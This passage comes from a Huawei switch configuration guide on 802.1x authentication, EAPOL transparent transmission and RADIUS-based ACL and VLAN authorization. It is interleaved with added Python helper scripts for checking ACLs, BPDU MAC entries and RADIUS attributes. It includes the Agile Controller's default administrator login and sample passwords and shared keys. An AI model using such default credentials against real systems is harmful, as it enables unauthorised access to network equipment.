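             no_match: str = "permit") -> Tuple[str, Optional[int]]:
    """First matching rule wins; returns (action, rule number).
    no_match is the assumed result when nothing matches (rule number None)."""
    s, d = _ip(src), _ip(dst)
    for r in rules:
        if r.src is not None and not wildcard_match(s, *r.src):
            continue
        if r.dst is not None and not wildcard_match(d, *r.dst):
            continue
        return r.action, r.number
    return no_match, None


# ACL bodies copied from this page.
RD_ACL = parse_acl("""acl number 3001
 rule 1 permit ip""")
MARKETING_ACL = parse_acl("""acl number 3002
 rule 1 deny ip destination 172.16.1.4 0
 rule 2 deny ip destination 172.16.1.5 0
 rule 3 permit ip""")
WHITELIST_ACL = parse_acl("""acl number 3002
 rule 1 permit ip destination 192.168.102.100 0
 rule 2 deny ip destination any""")
# Constructed variant: the same whitelist with its final deny left out.
OPEN_ACL = parse_acl(" rule 1 permit ip destination 192.168.102.100 0")

if __name__ == "__main__":
    for name, acl, dst in (("marketing -> code library", MARKETING_ACL, "172.16.1.4"),
                           ("marketing -> Internet", MARKETING_ACL, "203.0.113.9"),
                           ("whitelist -> other host", WHITELIST_ACL, "192.168.102.101"),
                           ("no final deny -> other host", OPEN_ACL, "192.168.102.101")):
        print(f"{name:30s} {evaluate(acl, '192.168.200.10', dst)}")
```

The last case in the usage loop is the one to watch: with the final deny removed, a user in the post-authentication domain reaches every host that is not explicitly listed, which turns the whitelist into a no-op.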

Step 2 Configure the access switches.


1. Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded. This example uses SwitchC to describe the configuration. The configuration
on SwitchD is the same as that on SwitchC.
# Create VLAN 200.
<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] vlan batch 200

# Configure the interface connected to users as an access interface and add the interface
to VLAN 200.
[SwitchC] interface gigabitethernet 0/0/1
[SwitchC-GigabitEthernet0/0/1] port link-type access
[SwitchC-GigabitEthernet0/0/1] port default vlan 200
[SwitchC-GigabitEthernet0/0/1] quit
[SwitchC] interface gigabitethernet 0/0/2
[SwitchC-GigabitEthernet0/0/2] port link-type access
[SwitchC-GigabitEthernet0/0/2] port default vlan 200
[SwitchC-GigabitEthernet0/0/2] quit

# Configure the interface connected to the upstream network as a trunk interface and
configure it to allow VLAN 200.
[SwitchC] interface gigabitethernet 0/0/3
[SwitchC-GigabitEthernet0/0/3] port link-type trunk
[SwitchC-GigabitEthernet0/0/3] port trunk allow-pass vlan 200
[SwitchC-GigabitEthernet0/0/3] quit
2. Configure the device to transparently transmit 802.1x packets. This example uses
SwitchC to describe the configuration. The configuration on SwitchD is the same as that
on SwitchC.
NOTE

In this example, SwitchC and SwitchD are deployed between the authentication switch SwitchA and
users. EAP packet transparent transmission needs to be configured on SwitchC and SwitchD so that
SwitchA can perform 802.1x authentication for users.
– Method 1:
[SwitchC] l2protocol-tunnel user-defined-protocol 802.1X protocol-mac
0180-c200-0003 group-mac 0100-0000-0002
[SwitchC] interface gigabitethernet 0/0/1
[SwitchC-GigabitEthernet0/0/1] l2protocol-tunnel user-defined-protocol
802.1X enable
[SwitchC-GigabitEthernet0/0/1] bpdu enable
[SwitchC-GigabitEthernet0/0/1] quit
[SwitchC] interface gigabitethernet 0/0/2
[SwitchC-GigabitEthernet0/0/2] l2protocol-tunnel user-defined-protocol
802.1X enable
[SwitchC-GigabitEthernet0/0/2] bpdu enable
[SwitchC-GigabitEthernet0/0/2] quit
[SwitchC] interface gigabitethernet 0/0/3
[SwitchC-GigabitEthernet0/0/3] l2protocol-tunnel user-defined-protocol
802.1X enable
[SwitchC-GigabitEthernet0/0/3] bpdu enable
[SwitchC-GigabitEthernet0/0/3] quit
– Method 2: This method is recommended when a large number of users exist or
high forwarding performance is required. By default, the entry 0180-c200-0000
ffff-ffff-fff0 makes the switch treat every frame sent to 01-80-C2-00-00-00
through 01-80-C2-00-00-0F as a BPDU, and that range includes the 802.1x PAE
group address 01-80-C2-00-00-03. The four entries configured below cover the
same range except 0180-c200-0003, so EAPOL frames are forwarded like ordinary
traffic and reach SwitchA.
[SwitchC] undo bpdu mac-address 0180-c200-0000 ffff-ffff-fff0
[SwitchC] bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFFE
[SwitchC] bpdu mac-address 0180-c200-0002 FFFF-FFFF-FFFF
[SwitchC] bpdu mac-address 0180-c200-0004 FFFF-FFFF-FFFC
[SwitchC] bpdu mac-address 0180-c200-0008 FFFF-FFFF-FFF8
The following step is mandatory when you switch from method 1 to method 2.
[SwitchC] interface gigabitethernet 0/0/1
[SwitchC-GigabitEthernet0/0/1] undo l2protocol-tunnel user-defined-
protocol 802.1X enable
[SwitchC-GigabitEthernet0/0/1] quit
[SwitchC] interface gigabitethernet 0/0/2
[SwitchC-GigabitEthernet0/0/2] undo l2protocol-tunnel user-defined-
protocol 802.1X enable
[SwitchC-GigabitEthernet0/0/2] quit
[SwitchC] interface gigabitethernet 0/0/3
[SwitchC-GigabitEthernet0/0/3] undo l2protocol-tunnel user-defined-
protocol 802.1X enable
[SwitchC-GigabitEthernet0/0/3] quit
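Method 2 works only because the four bpdu mac-address entries, taken together, leave a hole at the EAPOL PAE group address. The following Python script is an added example, not code from this document or from Huawei, that checks this by computing which addresses in the reserved 01-80-C2-00-00-00 to 0F block a set of (MAC, mask) entries captures, in the notation typed on the switch. It models a captured frame as one the switch handles itself rather than forwards, which is the behaviour method 2 relies on; the reserved range considered and the switch-side semantics are assumptions stated in the code.

```python
"""Added example: which reserved multicast destination MACs a set of VRP
'bpdu mac-address <mac> <mask>' entries captures.

Assumption: a frame whose destination MAC matches (mac & mask) is handled by the
switch as a BPDU instead of being forwarded as ordinary multicast. 802.1x EAPOL
frames use the PAE group address 01-80-C2-00-00-03, so that address must not be
captured on an access switch that is supposed to pass 802.1x frames up to the
authenticator. Only the 16-address block 01-80-C2-00-00-00 .. 0F is considered.
"""
from typing import Iterable, Set, Tuple

RESERVED = range(0x0180C2000000, 0x0180C2000010)   # 01-80-C2-00-00-00 .. 0F
EAPOL_PAE = 0x0180C2000003


def parse_mac(text: str) -> int:
    """Accepts 0180-c200-0003, 01-80-c2-00-00-03 or 01:80:c2:00:00:03."""
    digits = text.replace("-", "").replace(":", "").replace(".", "")
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {text!r}")
    return int(digits, 16)


def format_mac(value: int) -> str:
    """Integer -> the xxxx-xxxx-xxxx form used in VRP commands."""
    hexed = f"{value:012x}"
    return f"{hexed[0:4]}-{hexed[4:8]}-{hexed[8:12]}"


def captured(entries: Iterable[Tuple[str, str]]) -> Set[int]:
    """Reserved addresses that the given (mac, mask) entries match."""
    parsed = [(parse_mac(mac), parse_mac(mask)) for mac, mask in entries]
    return {addr for addr in RESERVED
            if any((addr & mask) == (base & mask) for base, mask in parsed)}


def eapol_transparent(entries: Iterable[Tuple[str, str]]) -> bool:
    """True if EAPOL frames would be forwarded rather than terminated."""
    return EAPOL_PAE not in captured(entries)


# The default entry that method 2 removes with 'undo bpdu mac-address ...'.
DEFAULT_ENTRY = [("0180-c200-0000", "ffff-ffff-fff0")]
# The four entries method 2 adds in its place.
METHOD2_ENTRIES = [
    ("0180-c200-0000", "ffff-ffff-fffe"),   # ...00, ...01
    ("0180-c200-0002", "ffff-ffff-ffff"),   # ...02
    ("0180-c200-0004", "ffff-ffff-fffc"),   # ...04 .. ...07
    ("0180-c200-0008", "ffff-ffff-fff8"),   # ...08 .. ...0f
]

if __name__ == "__main__":
    for label, entries in (("default", DEFAULT_ENTRY), ("method 2", METHOD2_ENTRIES)):
        forwarded = sorted(set(RESERVED) - captured(entries))
        print(f"{label}: EAPOL transparent = {eapol_transparent(entries)}; "
              f"forwarded = {[format_mac(a) for a in forwarded]}")
```

Run against the page's own entries the script reports that the default single entry captures all 16 addresses, including the EAPOL address, while the method 2 set captures 15 and forwards only 0180-c200-0003. The same check is useful before adding any further bpdu mac-address entry: an entry with a mask ending in fff0, fff2 or fffb, for instance, would silently recapture EAPOL and break 802.1x for every user behind that access switch.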

Step 3 Configure the Agile Controller.


1. Log in to the Agile Controller.
a. Open the Internet Explorer, enter the Agile Controller address in the address box,
and press Enter.
The following table provides two types of Agile Controller addresses.
Address Format | Description
https://Agile Controller-IP:8443 | In the address, Agile Controller-IP indicates
the Agile Controller IP address.
Agile Controller IP address | If port 80 is enabled during installation, you
can access the Agile Controller by simply entering its IP address without the
port number. The Agile Controller address will automatically change to
https://Agile Controller-IP:8443.

b. Enter the administrator account and password.


If you log in to the Agile Controller for the first time, use the super administrator
account admin and password Changeme123. Change the password immediately
after logging in. Otherwise, the Agile Controller cannot be used.
2. Create a department and account.
a. Choose Resource > User > User Management.
b. Click the Department tab in the operation area on the right. Then click Add under
the Department tab, and add the department R&D.
c. Click the User tab in the operation area on the right. Then click Add under the User
tab, and add the user A.
d. Click the account management icon in the Operation column on the right of
user A. The Account Management page is displayed. Click Add, and create a
common account A-123 with the password Huawei123.
e. On the User tab page, select user A and click Transfer to add user A to the R&D
department.

3. Add switches to the Agile Controller so that the switches can communicate with the
Agile Controller.
a. Choose Resource > Device > Device Management.
b. Click Permission Control Device Group in the navigation tree, and click
Add SubGroup to create a device group Switch.

c. Click the device group in the navigation tree and select ALL Device. Click Add to
add network access devices.
d. Set connection parameters on the Add Device page.

Parameter | Value | Description
Name | SwitchA | -
IP Address | 192.168.10.10 | The interface on the switch must communicate with the Agile Controller.
Device Series | Huawei Quidway series switch | -
Authentication Key | Huawei@2014 | It must be the same as the shared key of the RADIUS authentication server configured on the switch.
Charging Key | Huawei@2014 | It must be the same as the shared key of the RADIUS accounting server configured on the switch.
Real-time charging interval (minute) | 15 | It must be the same as the real-time accounting interval configured on the switch.

e. Click Permission Control Device Group in the navigation tree, select SwitchC,
and click Move to move SwitchA to the Switch group. The configuration on
SwitchD is the same as that on SwitchC.
4. Add an authentication rule.
a. Choose Policy > Permission Control > Authentication and Authorization >
Authentication Rule and click Add to create an authentication rule.
b. Configure basic information for the authentication rule.

Parameter | Value | Description
Name | Access authentication rule | -
Service Type | Access service | -
Authentication Condition | Device group Switch | Customize authentication rules based on the requirements of your network.
Please select the allowed authentication protocol | EAP-PEAP-MSCHAPv2 | -

5. Add an authorization result.


a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Result and click Add to create an authorization result.
b. Configure basic information for the authorization result.
Parameter | Value | Description
Name | Post-authentication domain | -
Service Type | Access service | -
ACL Number/AAA User Group | 3002 | The ACL number must be the same as the number of the ACL configured for R&D employees on the switch.

6. Add an authorization rule.

After a user passes the authentication, the authorization phase starts. The Agile Controller
grants the user access rights based on the authorization rule.

a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Rule and click Add to create an authorization rule.
b. Configure basic information for the authorization rule.

Parameter | Value | Description
Name | Authorization rule for R&D employees | -
Service Type | Access service | -
Access Device Group | Switch | -
Authorization Result | Post-authentication domain | -

Step 4 Verify the configuration.


l An employee can only access the Agile Controller server before passing the
authentication.
l After passing the authentication, the employee can access resources in the post-
authentication domain.
l After the employee passes the authentication, run the display access-user command on
the switch. The command output shows information about the online employee.

----End

Configuration Files
l SwitchA configuration file
#
sysname SwitchA
#
vlan batch 100 200
#
authentication-profile name p1
dot1x-access-profile d1
mac-access-profile m1
#
domain isp
#
radius-server template rd1
radius-server shared-key cipher %#%#FP@&C(&{$F2HTlPxg^NLS~KqA/\^3Fex;T@Q9A](%#%#
radius-server authentication 192.168.100.100 1812 weight 80
radius-server accounting 192.168.100.100 1813 weight 80
#
dot1x-access-profile name d1
#
mac-access-profile name m1
mac-authen username fixed A-123 password cipher %#%#'Fxw8E,G-81(A3U<^HH9Sj\:&hTdd>R>HILQYLtW%#%#
#
acl number 3002
rule 1 permit ip destination 192.168.102.100 0
rule 2 deny ip
#
aaa
authentication-scheme abc
authentication-mode radius
accounting-scheme acco1
accounting-mode radius
accounting realtime 15
domain isp
authentication-scheme abc
accounting-scheme acco1
radius-server rd1
#
interface Vlanif100
ip address 192.168.10.10 255.255.255.0
#
interface Vlanif200
ip address 192.168.200.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 200
authentication-profile p1
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 200
authentication-profile p1
#
interface GigabitEthernet1/0/6
port link-type trunk
port trunk allow-pass vlan 100
#
ip route-static 192.168.100.0 255.255.255.0 192.168.10.10
ip route-static 192.168.102.0 255.255.255.0 192.168.10.10
#
return

l SwitchC configuration file


#
sysname SwitchC

#
vlan batch 200
#
l2protocol-tunnel user-defined-protocol 802.1x protocol-mac 0180-c200-0003 group-mac 0100-0000-0002
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 200
l2protocol-tunnel user-defined-protocol 802.1x enable
#
interface GigabitEthernet0/0/2
port link-type access
port default vlan 200
l2protocol-tunnel user-defined-protocol 802.1x enable
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk allow-pass vlan 200
l2protocol-tunnel user-defined-protocol 802.1x enable
#
return

10.6.4 Example for Configuring User Authorization Based on ACL or Dynamic VLAN Delivery

Overview
After an 802.1x user is successfully authenticated on a RADIUS server, the server sends
authorization information to the access device of the user. When the Agile Controller
functions as the RADIUS server, it can deliver multiple authorization parameters.
l ACL-based authorization is classified into ACL number-based (static ACL-based) and
dynamic ACL-based authorization.
– ACL number: If ACL number delivery is configured on the server, the authorization
information sent to the access device includes the ACL number. The access device
matches ACL rules based on the delivered ACL number to control user rights.
The RADIUS attribute used for ACL number delivery is (011) Filter-Id.
– Dynamic ACL: The server delivers rules in an ACL to the device. Users can access
network resources controlled using this ACL. The ACL and ACL rules must be
configured on the server. The ACL does not need to be configured on the device.
The RADIUS attribute used for dynamic ACL delivery is Huawei extended
RADIUS attribute (26-82) HW-Data-Filter.
l Dynamic VLAN: If dynamic VLAN delivery is configured on the server, the
authorization information sent to the access device includes the VLAN attribute. After
the access device receives the authorization information, it changes the VLAN of the
user to the delivered VLAN.
The delivered VLAN does not change or affect the interface configuration. The delivered
VLAN, however, takes precedence over the VLAN configured on the interface. That is,
the delivered VLAN takes effect after the authentication succeeds, and the configured
VLAN takes effect after the user goes offline.
The following RADIUS attributes are used for dynamic VLAN delivery:
– (064) Tunnel-Type (It must be set to VLAN or 13.)
– (065) Tunnel-Medium-Type (It must be set to 802 or 6.)
– (081) Tunnel-Private-Group-ID (It can be a VLAN ID or VLAN name.)

To ensure that the RADIUS server delivers VLAN information correctly, all the three
RADIUS attributes must be used. In addition, the Tunnel-Type and Tunnel-Medium-
Type attributes must be set to the specified values.
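The attributes listed above travel in the RADIUS Access-Accept as type/length/value pairs. The following Python is an added example, not code from this document or from Huawei: it encodes (011) Filter-Id and the three tunnel attributes as RFC 2868 tagged values (tag byte 0 is my assumption; the page does not state a tag), parses them back with length checks, and applies the rule just stated, accepting a VLAN only when all three attributes are present with Tunnel-Type 13 and Tunnel-Medium-Type 6. All function names are mine.

```python
from typing import List, Optional, Tuple

# RADIUS attribute numbers named on this page (RFC 2865 / RFC 2868).
FILTER_ID = 11                 # (011) Filter-Id: ACL number delivery
TUNNEL_TYPE = 64               # (064) Tunnel-Type, must be VLAN (13)
TUNNEL_MEDIUM_TYPE = 65        # (065) Tunnel-Medium-Type, must be 802 (6)
TUNNEL_PRIVATE_GROUP_ID = 81   # (081) Tunnel-Private-Group-ID: VLAN ID or name
TUNNEL_TYPE_VLAN = 13
TUNNEL_MEDIUM_802 = 6

Attr = Tuple[int, bytes]


def encode_avp(attr_type: int, value: bytes) -> bytes:
    """One attribute as type(1) length(1) value; the length counts the 2-byte header."""
    if not 1 <= len(value) <= 253:
        raise ValueError("RADIUS attribute value must be 1..253 bytes")
    return bytes([attr_type, len(value) + 2]) + value


def encode_tagged_int(attr_type: int, value: int, tag: int = 0) -> bytes:
    # RFC 2868 tagged integer: one tag byte followed by a 3-byte big-endian value.
    return encode_avp(attr_type, bytes([tag]) + value.to_bytes(3, "big"))


def encode_tagged_str(attr_type: int, text: str, tag: int = 0) -> bytes:
    # RFC 2868 tagged string: one tag byte followed by the string itself.
    return encode_avp(attr_type, bytes([tag]) + text.encode("ascii"))


def build_authorization(vlan: Optional[int] = None,
                        acl_number: Optional[int] = None) -> bytes:
    """Attribute bytes an Access-Accept would carry for the authorization on this page."""
    out = b""
    if acl_number is not None:
        out += encode_avp(FILTER_ID, str(acl_number).encode("ascii"))
    if vlan is not None:
        out += encode_tagged_int(TUNNEL_TYPE, TUNNEL_TYPE_VLAN)
        out += encode_tagged_int(TUNNEL_MEDIUM_TYPE, TUNNEL_MEDIUM_802)
        out += encode_tagged_str(TUNNEL_PRIVATE_GROUP_ID, str(vlan))
    return out


def parse_attributes(data: bytes) -> List[Attr]:
    """Walk the attribute list, rejecting truncated or malformed lengths."""
    attrs: List[Attr] = []
    pos = 0
    while pos < len(data):
        if len(data) - pos < 2:
            raise ValueError("truncated attribute header")
        attr_type, length = data[pos], data[pos + 1]
        if length < 3 or pos + length > len(data):
            raise ValueError("bad attribute length")
        attrs.append((attr_type, data[pos + 2:pos + length]))
        pos += length
    return attrs


def _untag(value: bytes) -> bytes:
    # RFC 2868: a first byte above 0x1F is data, not a tag, so "20" may arrive untagged.
    return value[1:] if value and value[0] <= 0x1F else value


def authorized_vlan(attrs: List[Attr]) -> Optional[str]:
    """VLAN the access device would apply, or None when the triple is absent or inconsistent."""
    found = dict(attrs)
    needed = (TUNNEL_TYPE, TUNNEL_MEDIUM_TYPE, TUNNEL_PRIVATE_GROUP_ID)
    if any(t not in found for t in needed):
        return None
    if int.from_bytes(_untag(found[TUNNEL_TYPE]), "big") != TUNNEL_TYPE_VLAN:
        return None
    if int.from_bytes(_untag(found[TUNNEL_MEDIUM_TYPE]), "big") != TUNNEL_MEDIUM_802:
        return None
    return _untag(found[TUNNEL_PRIVATE_GROUP_ID]).decode("ascii")


def authorized_acl(attrs: List[Attr]) -> Optional[str]:
    """ACL number carried in Filter-Id, or None if the server delivered none."""
    for attr_type, value in attrs:
        if attr_type == FILTER_ID:
            return value.decode("ascii")
    return None
```

Running `authorized_vlan` over a capture from a misbehaving server makes the failure mode concrete: if Tunnel-Medium-Type is missing or Tunnel-Type is not 13, no VLAN is applied and the user stays in the VLAN configured on the interface, which is the behaviour the note above describes.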

NOTE

The following uses ACL number and dynamic VLAN delivery as an example. The configuration differences
between ACL number delivery and dynamic ACL delivery are described in notes.

Configuration Notes
l This example applies to V200R007C20, V200R009 and later versions.
NOTE
To know details about software mappings, see Version Mapping Search for Huawei Campus Switches.
l Making VLAN-based authorization take effect has the following requirements on the
link type and access control mode of the authentication interface:
– If the interface link type is hybrid and the interface has been added to a VLAN in
untagged mode, the access control mode can be MAC address-based or interface-
based.
– If the interface link type is access or trunk, the access control mode can only be
interface-based.

Networking Requirements
As shown in Figure 10-42, a large number of employees' terminals in a company connect to
the intranet through GE0/0/1 on SwitchA. To ensure network security, the administrator needs
to control network access rights of terminals. The requirements are as follows:
l Before passing authentication, terminals can access the public server (with IP address
192.168.40.1), and download the 802.1x client or update the antivirus database.
l After passing authentication, terminals can access the service server (with IP address
192.168.50.1) and devices in the laboratory (with VLAN ID 20 and IP address segment
192.168.20.10-192.168.20.100).

Figure 10-42 Wired access networking diagram

[Figure: employees' terminals connect to SwitchA GE0/0/1 (VLAN10); the laboratory connects to SwitchA GE0/0/2 (VLAN20); SwitchA GE0/0/3 connects to SwitchB GE1/0/1; SwitchB connects to the intranet with the Agile Controller (IP address 192.168.30.1), the public server (IP address 192.168.40.1) and the service server (IP address 192.168.50.1).]

Data Plan

Table 10-24 Service data plan for the access switch

Item | Data
RADIUS scheme | Authentication server IP address: 192.168.30.1; authentication server port number: 1812; accounting server IP address: 192.168.30.1; accounting server port number: 1813; shared key for the RADIUS server: Huawei@123; accounting interval: 15 minutes; authentication domain: huawei
Resources accessible to users before authentication | Access rights to the public server are configured using an authentication-free rule. The name of the authentication-free rule profile is default_free_rule.
Resources accessible to users after authentication | Access rights to the laboratory are granted using a dynamic VLAN. The VLAN ID is 20. Access rights to the service server are granted using an ACL number. The ACL number is 3002.
Table 10-25 Service data plan for the Agile Controller

Item | Data
Department | R&D department
Access user | User name: A; wired access account: A-123; password: Huawei123
Switch IP address | SwitchA: 10.10.10.1
RADIUS authentication key | Huawei@123
RADIUS accounting key | Huawei@123

Configuration Roadmap
1. Configure the access switch, including the VLANs that interfaces belong to, parameters for
connecting to the RADIUS server, enabling NAC, and the network access rights users obtain
after passing authentication.
NOTE
In this example, ensure that reachable routes exist between SwitchA, SwitchB, servers, laboratory, and
employees' terminals.
2. Configure the Agile Controller.
a. Log in to the Agile Controller.
b. Add an account to the Agile Controller.
c. Add switches to the Agile Controller.
d. Configure authorization results and authorization rules on the Agile Controller.

Procedure
Step 1 Configure access switch SwitchA.
1. Create VLANs and configure the allowed VLANs on interfaces to ensure network
connectivity.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 20
[SwitchA] interface gigabitethernet 0/0/1 //Configure the interface connecting to employees' terminals.
[SwitchA-GigabitEthernet0/0/1] port link-type hybrid
[SwitchA-GigabitEthernet0/0/1] port hybrid pvid vlan 10
[SwitchA-GigabitEthernet0/0/1] port hybrid untagged vlan 10
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2 //Configure the interface connecting to the laboratory.
[SwitchA-GigabitEthernet0/0/2] port link-type hybrid
[SwitchA-GigabitEthernet0/0/2] port hybrid untagged vlan 20
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3 //Configure the interface connecting to SwitchB.
[SwitchA-GigabitEthernet0/0/3] port link-type trunk
[SwitchA-GigabitEthernet0/0/3] port trunk allow-pass vlan 10 20
[SwitchA-GigabitEthernet0/0/3] quit
[SwitchA] interface loopback 1

[SwitchA-LoopBack1] ip address 10.10.10.1 24 //Configure an IP address for communication with the Agile Controller.
[SwitchA-LoopBack1] quit

2. Create and configure a RADIUS server template, an AAA authentication scheme, and an
authentication domain.
# Create and configure the RADIUS server template rd1.
[SwitchA] radius-server template rd1
[SwitchA-radius-rd1] radius-server authentication 192.168.30.1 1812
[SwitchA-radius-rd1] radius-server accounting 192.168.30.1 1813
[SwitchA-radius-rd1] radius-server shared-key cipher Huawei@123
[SwitchA-radius-rd1] quit

# Create the AAA authentication scheme abc and set the authentication mode to
RADIUS.
[SwitchA] aaa
[SwitchA-aaa] authentication-scheme abc
[SwitchA-aaa-authen-abc] authentication-mode radius
[SwitchA-aaa-authen-abc] quit

# Configure the accounting scheme acco1 and set the accounting mode to RADIUS.
[SwitchA-aaa] accounting-scheme acco1
[SwitchA-aaa-accounting-acco1] accounting-mode radius
[SwitchA-aaa-accounting-acco1] accounting realtime 15
[SwitchA-aaa-accounting-acco1] quit

# Create the authentication domain huawei, and bind the AAA authentication scheme
abc, accounting scheme acco1, and RADIUS server template rd1 to the domain.
[SwitchA-aaa] domain huawei
[SwitchA-aaa-domain-huawei] authentication-scheme abc
[SwitchA-aaa-domain-huawei] accounting-scheme acco1
[SwitchA-aaa-domain-huawei] radius-server rd1
[SwitchA-aaa-domain-huawei] quit
[SwitchA-aaa] quit

3. Configure an authentication-free rule profile.


[SwitchA] free-rule-template name default_free_rule
[SwitchA-free-rule-default_free_rule] free-rule 10 destination ip 192.168.40.0 mask 24
[SwitchA-free-rule-default_free_rule] quit

4. Enable 802.1x authentication.


# Set the NAC mode to unified.
[SwitchA] authentication unified-mode

NOTE
By default, the unified mode is enabled. Before changing the NAC mode, you must save the
configuration. After the mode is changed and the device is restarted, functions of the newly configured
mode take effect.

# Configure the 802.1x access profile d1.


[SwitchA] dot1x-access-profile name d1
[SwitchA-dot1x-access-profile-d1] quit

# Configure the authentication profile p1, bind the 802.1x access profile d1 and
authentication-free rule profile default_free_rule to the authentication profile, specify
the domain huawei as the forcible authentication domain in the authentication profile,
and set the user access mode to multi-authen.
[SwitchA] authentication-profile name p1
[SwitchA-authen-profile-p1] dot1x-access-profile d1
[SwitchA-authen-profile-p1] free-rule-template default_free_rule
[SwitchA-authen-profile-p1] access-domain huawei force
[SwitchA-authen-profile-p1] authentication mode multi-authen
[SwitchA-authen-profile-p1] quit

# Bind the authentication profile p1 to GE0/0/1 and enable 802.1x authentication on the
interface.
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] authentication-profile p1
[SwitchA-GigabitEthernet0/0/1] quit

5. Configure the authorization parameter ACL 3002 for users who pass authentication.
NOTE

In dynamic ACL mode, this step does not need to be configured on the device.
[SwitchA] acl 3002
[SwitchA-acl-adv-3002] rule 1 permit ip destination 192.168.30.1 0
[SwitchA-acl-adv-3002] rule 2 permit ip destination 192.168.50.1 0
[SwitchA-acl-adv-3002] rule 3 deny ip destination any
[SwitchA-acl-adv-3002] quit

Step 2 Configure the Agile Controller.


1. Log in to the Agile Controller.
a. Open the Internet Explorer, enter the Agile Controller access address in the address
bar, and press Enter.
The following table describes addresses for accessing the Agile Controller.

Access Mode | Description
https://Agile Controller-IP:8443 | Agile Controller-IP specifies the IP address of the Agile Controller.
IP address of the Agile Controller | If port 80 is enabled during installation, you can access the Agile Controller by entering its IP address without the port number. The Agile Controller URL will automatically change to https://Agile Controller-IP:8443.

b. Enter the administrator user name and password.


If you log in to the Agile Controller for the first time, use the super administrator
user name admin and password Changeme123. Change the password immediately
after logging in. Otherwise, the Agile Controller cannot be used.
2. Create a department and an account.
a. Choose Resource > User > User Management.
b. Click the Department tab in the operation area on the right, and then click Add
under the Department tab to add a department R&D.

c. Click the User tab in the operation area on the right, and then click Add under the
User tab to add a user A.

d. Click next to user A in Operation to access Account Management. Click Add. Create a common account A-123 and set the password to Huawei123.

e. In the User tab, select user A. Click Transfer to add user A to the department
R&D.

3. Add switches to the Agile Controller so that the switches can communicate with the
Agile Controller.
Choose Resource > Device > Device Management. Click Add in the operation area on
the right. Set connection parameters on the Add Device page.

4. Add an authorization result.


NOTE
Perform this step for ACL number and VLAN delivery.

a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Result and click Add to create an authorization result.
b. Configure basic information for the authorization result.
Parameter | Value | Description
Name | Authorization info for authenticated users | -
Service type | Access service | -
VLAN | 20 | The VLAN must be the same as the VLAN configured for R&D employees on the switch.
ACL number/AAA user group | 3002 | The ACL number must be the same as the number of the ACL configured for R&D employees on the switch.

5. Add an authorization result.


NOTE
Perform this step for dynamic ACL and VLAN delivery.

a. Add a dynamic ACL.


i. Choose Policy > Permission Control > Policy Element > Dynamic ACL.
ii. Click Add.
iii. Configure basic information for the dynamic ACL and click Add in Rule List.
iv. Configure attributes contained in the dynamic ACL.

b. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Result and click Add to create an authorization result.
c. Configure basic information for the authorization result.
Parameter | Value | Description
Name | Authorization information for users who pass authentication | -
Service type | Access service | -
VLAN | 20 | The VLAN ID must be the same as the VLAN ID configured for R&D employees on the switch.
Dynamic ACL | 3002 | -

6. Add an authorization rule.

After a user passes authentication, the authorization phase starts. The Agile Controller grants
the user access rights based on the authorization rule.

a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Rule and click Add to create an authorization rule.
b. Configure basic information for the authorization rule.

Parameter | Value | Description
Name | Authorization rule for authenticated users | -
Service type | Access service | -
Department | R&D department | -
Authorization result | Authorization info for authenticated users | -

Step 3 Verify the configuration.


l An employee can only access the Agile Controller server and public server before
passing authentication.
l An employee can access the Agile Controller server, public server, service server, and
laboratory after passing authentication.
l After the employee passes authentication, run the display access-user command on the
switch. The command output shows information about the online employee.

----End
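The verification bullets above can be checked against the switch configuration text itself. The following Python is an added example, not part of this document or of Huawei's software: it parses the advanced ACL and the authentication-free rule from a constructed excerpt of the SwitchA configuration file shown on this page, converts Huawei wildcard masks to networks, and evaluates first-match reachability of a destination before and after authentication. Before authentication it treats the RADIUS server address as reachable, since the switch permits packets to RADIUS and Portal servers by default (stated in the configuration notes on this page), plus the free-rule destinations; after authentication it applies the user ACL. Only ACL-based rights are modelled; the laboratory access granted by dynamic VLAN 20 is outside the model. Traffic matching no ACL rule is assumed permitted, which never decides the result here because the ACL ends with an explicit deny. All function names are mine.

```python
import ipaddress
import re
from typing import List, Tuple

# Constructed excerpt of the SwitchA configuration file shown on this page.
SWITCH_CONFIG = """\
acl number 3002
 rule 1 permit ip destination 192.168.30.1 0
 rule 2 permit ip destination 192.168.50.1 0
 rule 3 deny ip
#
free-rule-template name default_free_rule
 free-rule 10 destination ip 192.168.40.0 mask 255.255.255.0
#
"""

# Accepts both "rule 3 deny ip" (configuration file) and "rule 3 deny ip destination any" (CLI).
_ACL_RULE = re.compile(
    r"rule\s+(\d+)\s+(permit|deny)\s+ip(?:\s+destination\s+(?:any|(\S+)\s+(\S+)))?\s*$")
# Accepts "mask 24" (CLI form on this page) and "mask 255.255.255.0" (configuration file form).
_FREE_RULE = re.compile(
    r"free-rule\s+\d+\s+destination\s+ip\s+(\S+)\s+mask\s+(\S+)\s*$")

AclRule = Tuple[int, str, ipaddress.IPv4Network]
ANY = ipaddress.IPv4Network("0.0.0.0/0")


def wildcard_to_network(addr: str, wildcard: str) -> ipaddress.IPv4Network:
    """Huawei ACLs use wildcard masks: 0 bits must match, 1 bits are ignored.
    A bare '0', as written on this page, means an exact host match."""
    wc = int(wildcard) if wildcard.isdigit() else int(ipaddress.IPv4Address(wildcard))
    if wc & (wc + 1):
        raise ValueError("non-contiguous wildcard masks are not modelled")
    prefix = 32 - wc.bit_length()
    return ipaddress.IPv4Network((addr, prefix), strict=False)


def parse_acl(config: str, acl_number: int) -> List[AclRule]:
    """Collect the rules of one advanced ACL in rule-number order (first match wins)."""
    rules: List[AclRule] = []
    inside = False
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("acl number "):
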